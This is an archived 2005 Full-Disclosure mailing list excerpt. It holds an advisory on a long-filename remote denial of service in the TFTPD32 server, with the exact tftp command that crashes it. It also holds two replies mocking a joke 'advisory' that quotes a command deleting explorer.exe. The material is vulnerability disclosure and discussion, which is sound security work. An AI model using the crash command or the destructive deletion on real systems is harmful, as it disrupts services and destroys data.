Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] TFTPD32 Long FileName Remote Denial of Service

2005-01-11 Thread Sowhat . 
TFTPD32 Long FileName Remote Denial of Service

By Sowhat
12.JAN.2005
http://secway.org/advisory/ad20050108.txt

Product Affected:

TFTPD 2.74 and prior

Impact:
Low


(1) Introduction

TFTPD32 is a bundle including a full featured TFTP server, a TFTP
client, a DHCP server and a Syslog server.
TFTPD32 is designed for Windows 95/NT/2000/XP.
"TFTPD32 recommended by Cisco, HP  and other companies" --From the
author's webpage.

For more information:
http://perso.wanadoo.fr/philippe.jounin/TFTPD32.html

(2) Details
A vulnerability in TFTPD32 may allow remote attackers crash the
TFTPD32 and therefore cause a Denial of Service.

aviram(@)beyondsecurity.com had reported "TFTPD32 Buffer Overflow
Vulnerability (Long filename)" to bugtraq. And it seems that the
author fixed the problem in v2.51.
But during a simple audit,I found that TFTPD32 is still vulnerable to
"Long Filenmae".

C:\Windows\System32>tftp -i 192.168.0.1 get A...[about 508 'A' here]...AA

The TFTPD32 will print the following error messages 2 times:
"Error:RecvFrom Returns 10040 <"A message sent on a datagram socket
was larger than the internal message buffer or some other network
limit, or the buffer used to receive a datagram into was smaller than
the datagram itself.">"
and then it will dead. 

But this vulnerability seems very unstable and not exploitable.
the TFTPD32 will not dead immediately ,usually 10-15 seconds after the
request,and some times you need to "get" 2-3 times.

(3) Solution

Waitting for the author's update

(4) Author Response

I have sent an email to the author BUT no reply yet.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Kevin Reiter 


: Windows Explorer is an advanced browsing tool made by Microsoft. It is used
: in daily tasks to open folders, copy files, delete files, rename files and
: view files on a system. It is the foundation of the World Wide Web and used

OK, we need to figure out which "Explorer" this guy is talkin' about - Internet
Explorer or Windows Explorer.

: Shogun Suzuki discovered that a remote user can connect to any machine via
: numerous exploits and use Windows Explorer to view files, rename files,
: delete files, change permissions on files stored on a remote machine that
: has been pwned.

..such as ...  (HINT:  What 'sploits?)

: On a command prompt: del C:\WINDOWS\explorer.exe

Erm...sure...OK.   But what happens when the poor sucker reboots the box and
discovers the O/S is inop (provided the O/S even lets you delete the file in the
first place, since explorer.exe is the shell ...)?

Sorry, but this was the very first post I saw after I joined this list a little
bit ago, and I couldn't resist a few comments.  Is this guy for real, or is 
this a
joke?

-K

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER

2005-01-11 Thread Martin Allert 


Are there any age-based or I-am-dumb-as-bread limitations to this mailing list 
so we will be spared from such nonsense in the future?

Like this idiotic "rm" exploit. The next thing is an exploit message for spying
out other servers by using sophisticated espionage tools based on HTTP,
developed by the CIA and maintained by the Illuminati.

One simply calls it a webbrowser, others call it crowbar of the net.
Or why would THEY name a webbrowser "spyglass"? :)

> Sent: Tuesday, January 11, 2005 5:52 PM
> To: [EMAIL PROTECTED]; bugtraq@securityfocus.com;
> full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER
> 
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> TEAM PWN4GE Security Advisory PWNED
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 
>   Severity: HIGH
>  Title: EXPLORER: Vulnerability in all versions of Windows Explorer
>   Date: January 11, 2005
> 
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 

*nonsense deleted*

Yours,

Martin

-- 


 arago AG, Institut fuer komplexes Datenmanagement
 Am Niddatal 3, 60488 Frankfurt/Main, [EMAIL PROTECTED]
 Tel. 069/405680, Fax 069/40568111, http://www.arago.de



pgpPiWdLbAnmt.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html